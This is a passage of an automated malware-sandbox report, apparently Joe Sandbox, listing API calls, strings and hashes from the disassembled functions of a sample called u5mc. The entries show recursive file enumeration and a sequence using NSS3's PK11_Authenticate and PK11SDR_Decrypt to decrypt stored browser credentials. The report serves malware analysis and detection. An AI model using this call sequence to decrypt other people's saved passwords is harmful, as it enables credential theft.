63J5MAASCG0V52G7I71I, xrefs: 004024B9
.=AC(1Wt, xrefs: 00402360
Y55CTPSK7PTE, xrefs: 00402216
H40DDBSWBRJA, xrefs: 004023D8
9XEIMFFG76AR, xrefs: 004021CB
P3YWR4CTHRR, xrefs: 00402423
V22S6NH, xrefs: 00402536
LTKLDLB9XUVQ3, xrefs: 004023A6
5BVTPTTAX, xrefs: 004024A0
O4GHD, xrefs: 00402248

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: AllocLocalstrlen
String ID: )PF%4+`el6&-$.=AC(1Wt$/#6A0G6w$/CQ$>a2&^$0\_}ytU85$1YQKUB5MHNMRC$2WP659GSYI7D$45V4ZAWIL5D$4WIODFL1OMD$539MPSJANSD$5BVTPTTAX$5E7EJAIFWP5BZROLZO6W$5J2",<$63J5MAASCG0V52G7I71I$911BXOTQKBROSQT2$97PBH04O66$9XEIMFFG76AR$A75HROVJ2$BA1006TG1QHMIPO3SP$BGK1DSVXC$BN51DT95$BNIEH7LB5LYH$CPB3S7O6$F5SFSJBWSZ08ADT4T$F9QCBZ$FV4H8MOSH$GUBG99T30LIFE$H40DDBSWBRJA$HF0VSCFMUJG$K3094870IF45XN$KNPF4XBE4WD2I8QMAU1C$KT4UVD513AOOPS$LTKLDLB9XUVQ3$M83VGAHGG0FCS0T$MUGWIADCOEIENRWC0F22$NFHT3JCV3KTA$O4GHD$OTAJOVG$P3YWR4CTHRR$S2PBMHIA67$SOQH1M1J$V22S6NH$W86NKZ1TY$XT2HJB$Y55CTPSK7PTE
API String ID: 3248042016-2633571359
Opcode ID: d92779cfddd38e3020545e8507b60a9d030c31f3bc9e46f9d48ebe44a710958b
Instruction ID: 6d4fa1a7d89d077bb939d407d54dd1ca20c5100c7d3b0b7d42ca26d5c3e45de1
Opcode Fuzzy Hash: d92779cfddd38e3020545e8507b60a9d030c31f3bc9e46f9d48ebe44a710958b
Instruction Fuzzy Hash: 0F91FDBDFC07007AE2246B637C03FA576A19790B08F64243BFF04691D2FAF915954A9E

Uniqueness

Uniqueness Score: -1.00%

Function 6BB56370 Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 382memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6BB563A0

Part of subcall function 6BB90FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6BB387ED,00000800,6BB2EF74,00000000), ref: 6BB91000
Part of subcall function 6BB90FF0: PR_NewLock.NSS3(?,00000800,6BB2EF74,00000000), ref: 6BB91016
Part of subcall function 6BB90FF0: PL_InitArenaPool.NSS3(00000000,security,6BB387ED,00000008,?,00000800,6BB2EF74,00000000), ref: 6BB9102B

PORT_NewArena_Util.NSS3(00000800), ref: 6BB563BD

Part of subcall function 6BB90FF0: TlsGetValue.KERNEL32(00000000,?,?,6BB387ED,00000800,6BB2EF74,00000000), ref: 6BB91044
Part of subcall function 6BB90FF0: free.MOZGLUE(00000000,?,00000800,6BB2EF74,00000000), ref: 6BB91064

PORT_ArenaAlloc_Util.NSS3(?,000000AC), ref: 6BB563DF

Part of subcall function 6BB910C0: TlsGetValue.KERNEL32(?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB910F3
Part of subcall function 6BB910C0: EnterCriticalSection.KERNEL32(?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB9110C
Part of subcall function 6BB910C0: PL_ArenaAllocate.NSS3(?,?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB91141
Part of subcall function 6BB910C0: PR_Unlock.NSS3(?,?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB91182
Part of subcall function 6BB910C0: TlsGetValue.KERNEL32(?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB9119C

memset.VCRUNTIME140(-00000008,00000000,000000A4), ref: 6BB563FD
SECITEM_AllocItem_Util.NSS3(?,00000014,?), ref: 6BB564C5
memcpy.VCRUNTIME140(?,?,?), ref: 6BB564E4
SECITEM_AllocItem_Util.NSS3(?,-00000020,?), ref: 6BB564FD
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6BB56567
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6BB56576
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6BB5658A
SECITEM_AllocItem_Util.NSS3(?,00000014,?), ref: 6BB5661C
memcpy.VCRUNTIME140(?,?,?), ref: 6BB5663B
SECITEM_AllocItem_Util.NSS3(?,00000020,?), ref: 6BB56652
memcpy.VCRUNTIME140(?,?,?), ref: 6BB5666C
SECITEM_AllocItem_Util.NSS3(?,0000002C,?), ref: 6BB56683
memcpy.VCRUNTIME140(?,?,?), ref: 6BB5669D
SECITEM_AllocItem_Util.NSS3(?,-00000038,?), ref: 6BB566B6
memcpy.VCRUNTIME140(?,?,00000000), ref: 6BB567D1
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6BB56920
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6BB5692F
PR_SetError.NSS3(00000000,00000000), ref: 6BB56952

Strings

NSS_USE_DECODED_CKA_EC_POINT, xrefs: 6BB561F4

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Util$AllocArena_Item_$memcpy$Free$ArenaValue$Error$Alloc_AllocateCriticalEnterInitLockPoolSectionUnlockcallocfreememset
String ID: NSS_USE_DECODED_CKA_EC_POINT
API String ID: 1866082725-837408685
Opcode ID: 4f4e107954e92b43f8ce21690d2730d22288bab654f7f41d839147f7ca07e744
Instruction ID: bc81bd0881f00dec4db2f0fb38bcdc387588bf042fc609f10f853b53fbd3ec06
Opcode Fuzzy Hash: 4f4e107954e92b43f8ce21690d2730d22288bab654f7f41d839147f7ca07e744
Instruction Fuzzy Hash: 7FE126B2D00259ABEF108F74DC41B9A77B8FF48318F0040A5E909AB251E739DA65CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6BC02370 Relevance: 45.9, APIs: 17, Strings: 9, Instructions: 405stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BC023B0
sqlite3_mprintf.NSS3(not authorized), ref: 6BC023D0
sqlite3_initialize.NSS3(?), ref: 6BC0244C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BC024BD
sqlite3_initialize.NSS3 ref: 6BC024D0
sqlite3_mprintf.NSS3(%s.%s,?,dll), ref: 6BC02509
sqlite3_snprintf.NSS3(?,00000000,unable to open shared library [%.*s],00000104,?,?), ref: 6BC02576
sqlite3_free.NSS3(00000000), ref: 6BC025AC
strlen.API-MS-WIN-CRT-STRING-L1-1-0(sqlite3_extension_init), ref: 6BC025F7
sqlite3_initialize.NSS3(?), ref: 6BC0260E
sqlite3_free.NSS3(00000000), ref: 6BC0263A
sqlite3_free.NSS3(00000000), ref: 6BC02536

Part of subcall function 6BABCA30: EnterCriticalSection.KERNEL32(?,?,?,6BB1F9C9,?,6BB1F4DA,6BB1F9C9,?,?,6BAE369A), ref: 6BABCA7A
Part of subcall function 6BABCA30: LeaveCriticalSection.KERNEL32(?), ref: 6BABCB26

Strings

unable to open shared library [%.*s], xrefs: 6BC0256F
sqlite3_extension_init, xrefs: 6BC02420, 6BC02488, 6BC025F6, 6BC027E1
error during initialization: %s, xrefs: 6BC0278A
no entry point [%s] in shared library [%s], xrefs: 6BC027E2
not authorized, xrefs: 6BC023CB
dll, xrefs: 6BC024FC
te3_, xrefs: 6BC02665
lib, xrefs: 6BC02696
%s.%s, xrefs: 6BC02504

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: sqlite3_freesqlite3_initializestrlen$CriticalSectionsqlite3_mprintf$EnterLeavesqlite3_snprintf
String ID: %s.%s$dll$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_extension_init$te3_$unable to open shared library [%.*s]
API String ID: 174208185-2963929688
Opcode ID: 9c0e9f135b9c93e959cdd78008322628bd49561194f0e9a7edcc77a7acba8f72
Instruction ID: e68111a660761cb7adc226407d1d16bb94c0879fc01f41b6669e0c1df92fe708
Opcode Fuzzy Hash: 9c0e9f135b9c93e959cdd78008322628bd49561194f0e9a7edcc77a7acba8f72
Instruction Fuzzy Hash: 51E11172E141159BEF048F64D8A1BAE7BB6AF45314F040068DC59AF341FB3EDA06CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004121F0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
HeapAlloc.KERNEL32(00000000), ref: 00412207
wsprintfA.USER32 ref: 00412223
FindFirstFileA.KERNEL32(?,?), ref: 0041223A
StrCmpCA.SHLWAPI(?,0041D84C), ref: 00412268
StrCmpCA.SHLWAPI(?,0041D850), ref: 0041227E
FindNextFileA.KERNEL32(000000FF,?), ref: 004122FF
FindClose.KERNEL32(000000FF), ref: 00412314
lstrcat.KERNEL32(?,04280AB8), ref: 00412339
lstrcat.KERNEL32(?,04287958), ref: 0041234C
lstrlen.KERNEL32(?), ref: 00412359
lstrlen.KERNEL32(?), ref: 0041236A

Strings

%s\%s, xrefs: 00412295
%s\*, xrefs: 00412217

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 13328894-2848263008
Opcode ID: 0a12d10b0853cdca75f850272d177170673b34ecfbac75b41269a42e2db7d2f4
Instruction ID: 68eafe57ffc654504e5fb8166b756e3a47007b1446461b295be9b39175aa6662
Opcode Fuzzy Hash: 0a12d10b0853cdca75f850272d177170673b34ecfbac75b41269a42e2db7d2f4
Instruction Fuzzy Hash: 5551A6B5940618ABCB20EBB0DC89FEE737DAB98300F404689F61A96150DF749BC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 6BB32320 Relevance: 28.8, APIs: 19, Instructions: 299threadmemoryCOMMON

Download Yara Rule

APIs

PL_strcasecmp.NSS3(?,?), ref: 6BB3235A
PR_SetError.NSS3(FFFFE005,00000000), ref: 6BB32371
PR_SetError.NSS3(FFFFE023,00000000), ref: 6BB323BD
PR_StringToNetAddr.NSS3(?,?), ref: 6BB323D9
PORT_NewArena_Util.NSS3(00000800), ref: 6BB323EA
CERT_DecodeAltNameExtension.NSS3(00000000,?), ref: 6BB32404
PR_GetCurrentThread.NSS3 ref: 6BB3248D
PORT_ArenaAlloc_Util.NSS3(?,-00000002), ref: 6BB324A6
htonl.WSOCK32(?), ref: 6BB325CC
PR_SetError.NSS3(FFFFD00C,00000000), ref: 6BB3261E
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6BB32632
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6BB32648
PR_GetCurrentThread.NSS3 ref: 6BB3265A
CERT_GetCommonName.NSS3(?), ref: 6BB32678
PR_StringToNetAddr.NSS3(?,?), ref: 6BB3268C
PR_SetError.NSS3(FFFFD00C,00000000), ref: 6BB326BF
PL_strcasecmp.NSS3(?,00000000), ref: 6BB326CE
PR_SetError.NSS3(FFFFD00C,00000000), ref: 6BB326E1
free.MOZGLUE(00000000), ref: 6BB326F1

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Error$Util$AddrArena_CurrentL_strcasecmpNameStringThread$Alloc_ArenaCommonDecodeExtensionFreeItem_Zfreefreehtonl
String ID:
API String ID: 1413209379-0
Opcode ID: d96172515dd01692e9bdb13063d7e73f82cf3cdfe0a290e3468ef5f560a02b92
Instruction ID: 64e5f7d44a74f95e0516492c7e39a4222d974a3b643c28d66ae42b2a7d3cf599
Opcode Fuzzy Hash: d96172515dd01692e9bdb13063d7e73f82cf3cdfe0a290e3468ef5f560a02b92
Instruction Fuzzy Hash: A7B1F3719083919BE710CF28D881B5EB7E4EFC5314F14892DE98897351EB38D985CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6BB60BA0 Relevance: 25.7, APIs: 17, Instructions: 242memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE0B3,00000000), ref: 6BB60BFA

Part of subcall function 6BBDC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BBDC2BF

PR_SetError.NSS3(FFFFE005,00000000), ref: 6BB60C18
PK11_HPKE_DestroyContext.NSS3(?,00000000), ref: 6BB60C2E
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6BB60C39
SECKEY_DestroyPublicKey.NSS3(?), ref: 6BB60C45
SECOID_FindOIDByTag_Util.NSS3(?), ref: 6BB60CC1
PORT_Alloc_Util.NSS3(?), ref: 6BB60CDA
memcpy.VCRUNTIME140(?,?,?), ref: 6BB60D1B
PK11_GenerateKeyPairWithOpFlags.NSS3 ref: 6BB60D79
PR_SetError.NSS3(FFFFE006,00000000), ref: 6BB60DB2
PK11_CreateContextBySymKey.NSS3(?,82000104,?,?), ref: 6BB60DE4
PR_SetError.NSS3(FFFFE001,00000000), ref: 6BB60DFE
PR_SetError.NSS3(FFFFE064,00000000), ref: 6BB60E2C
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6BB60E38
SECKEY_DestroyPublicKey.NSS3(?), ref: 6BB60E44
free.MOZGLUE(?), ref: 6BB60E7E
free.MOZGLUE(?), ref: 6BB60EAE

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: DestroyError$K11_$ContextPrivatePublicUtilfree$Alloc_CreateFindFlagsGeneratePairTag_ValueWithmemcpy
String ID:
API String ID: 2510822978-0
Opcode ID: 0f93a105b81ecbba022258a072a269a45eb98afab4996c2e3e8dc433c4af04f8
Instruction ID: d3cab24301b8a24a3028963a311b797eb7071dd555d2fa3f625d5e76bc73e721
Opcode Fuzzy Hash: 0f93a105b81ecbba022258a072a269a45eb98afab4996c2e3e8dc433c4af04f8
Instruction Fuzzy Hash: 1291CEB1904380ABD7108F29D881B1BBBE4FF84788F44896DF89997251F778ED54CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF90 Relevance: 16.6, APIs: 11, Instructions: 93stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040BFC3
lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,04280898), ref: 0040BFE1
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040BFEC
PK11_GetInternalKeySlot.NSS3 ref: 0040BFFA
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C015
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C05B
memcpy.MSVCRT ref: 0040C082
lstrcat.KERNEL32(?,0041D726), ref: 0040C0B3
lstrcat.KERNEL32(?,0041D727), ref: 0040C0C7
PK11_FreeSlot.NSS3(?), ref: 0040C0D1
lstrcat.KERNEL32(?,0041D72A), ref: 0040C0E8

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlenmemcpymemset
String ID:
API String ID: 3428224297-0
Opcode ID: 52605990ea01bca17d675fac138a1e19a7de02da9981d5b01ff6e8c7352eb267
Instruction ID: c615a08a89d19efff62b5a0e6981dcd2a682f0599fa2db432923c9597831d409
Opcode Fuzzy Hash: 52605990ea01bca17d675fac138a1e19a7de02da9981d5b01ff6e8c7352eb267
Instruction Fuzzy Hash: 22417E75D0420ADBDB20CF90DD88BEEBBB9BB48340F1041A9E605A72C0DB745A84CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0040D540 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,0041D746), ref: 0040D58E
StrCmpCA.SHLWAPI(?,0041DC28), ref: 0040D5DE
StrCmpCA.SHLWAPI(?,0041DC2C), ref: 0040D5F4
FindNextFileA.KERNEL32(000000FF,?), ref: 0040DB0A
FindClose.KERNEL32(000000FF), ref: 0040DB1C

Strings

\*.*, xrefs: 0040D556
[@, xrefs: 0040D562, 0040DB2A, 0040D623, 0040D5A5, 0040D626

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: [@$\*.*
API String ID: 2325840235-1445036518
Opcode ID: 3216c81fd6d92aed9d35c2e8b3f5b852a761e1b9d4d9739abecbc8b179df50c4
Instruction ID: 5086e1dd9f189559ddbff5738d7534b81ef4efc7c2da90a7a59429af0ff5c2f4
Opcode Fuzzy Hash: 3216c81fd6d92aed9d35c2e8b3f5b852a761e1b9d4d9739abecbc8b179df50c4
Instruction Fuzzy Hash: 27F1E3759142189ACB15FB61DC91EDE7739AF54304F8142DFA40A62091EF34AFC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 6BC462C0 Relevance: 13.5, APIs: 5, Strings: 2, Instructions: 1229threadstringCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6BC462F0

Part of subcall function 6BB20F00: PR_GetPageSize.NSS3(6BB20936,FFFFE8AE,?,6BAB16B7,00000000,?,6BB20936,00000000,?,6BAB204A), ref: 6BB20F1B
Part of subcall function 6BB20F00: PR_NewLogModule.NSS3(clock,6BB20936,FFFFE8AE,?,6BAB16B7,00000000,?,6BB20936,00000000,?,6BAB204A), ref: 6BB20F25

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000004), ref: 6BC46425
PR_GetCurrentThread.NSS3 ref: 6BC46432
memcpy.VCRUNTIME140(?,00000004,00000001), ref: 6BC4646B
memcpy.VCRUNTIME140(-0000000C,0010000C,?), ref: 6BC46E99

Part of subcall function 6BC45B90: PR_Lock.NSS3(00010000,?,00000000,?,6BB2DF9B), ref: 6BC45B9E
Part of subcall function 6BC45B90: PR_Unlock.NSS3 ref: 6BC45BEA

Strings

nity, xrefs: 6BC46393
9, xrefs: 6BC4731E

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: CurrentThreadmemcpy$LockModulePageSizeUnlockstrlen
String ID: 9$nity
API String ID: 1013806672-1485011959
Opcode ID: 380e8ad4714cda38f6c5be07d71f77273c139d52aad2c82e8df9a7324f906190
Instruction ID: 34090102f71a88cfc0f7c2cb0dda644f78f24290fd1f3a7685baa038e8450b0d
Opcode Fuzzy Hash: 380e8ad4714cda38f6c5be07d71f77273c139d52aad2c82e8df9a7324f906190
Instruction Fuzzy Hash: D3A2D271A29B418FC705CF38C49071AB7E2BF85344F158AAEE895A7345E738DB46CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6BAC8340 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 265COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001120C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6BAC843B
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6BAC848F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6BAC85BC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6BAC85E5

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6BAC8425, 6BAC853B
%s at line %d of [%.10s], xrefs: 6BAC8434
database corruption, xrefs: 6BAC842F

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: _byteswap_ulong$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2597148001-598938438
Opcode ID: e98452cb4a41c5c5ef7897f9725e42da30cf7f7029171a6f201c064073eef6b7
Instruction ID: c9c76bee084d131df2a0ab4df6371fe1253ab50613739006485cd4e37ae569e1
Opcode Fuzzy Hash: e98452cb4a41c5c5ef7897f9725e42da30cf7f7029171a6f201c064073eef6b7
Instruction Fuzzy Hash: BCA13C74E042099FDF04CFA9C591AAFB7B1BF48304F1840A9D915AB351E735ED81CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6BBC6BE0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6BBC6C2C

Part of subcall function 6BBC6E90: PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6BBC6BF7), ref: 6BBC6EB6
Part of subcall function 6BBC6E90: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6BC6FC0A,6BBC6BF7), ref: 6BBC6ECD
Part of subcall function 6BBC6E90: ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6BBC6EE0
Part of subcall function 6BBC6E90: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6BBC6EFC
Part of subcall function 6BBC6E90: PR_NewLock.NSS3 ref: 6BBC6F04
Part of subcall function 6BBC6E90: fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BBC6F18
Part of subcall function 6BBC6E90: PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6BBC6BF7), ref: 6BBC6F30
Part of subcall function 6BBC6E90: PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6BBC6BF7), ref: 6BBC6F54

TlsGetValue.KERNEL32 ref: 6BBC6D93
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6BBC6BF7), ref: 6BBC6FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6BBC6BF7), ref: 6BBC6FFD

Strings

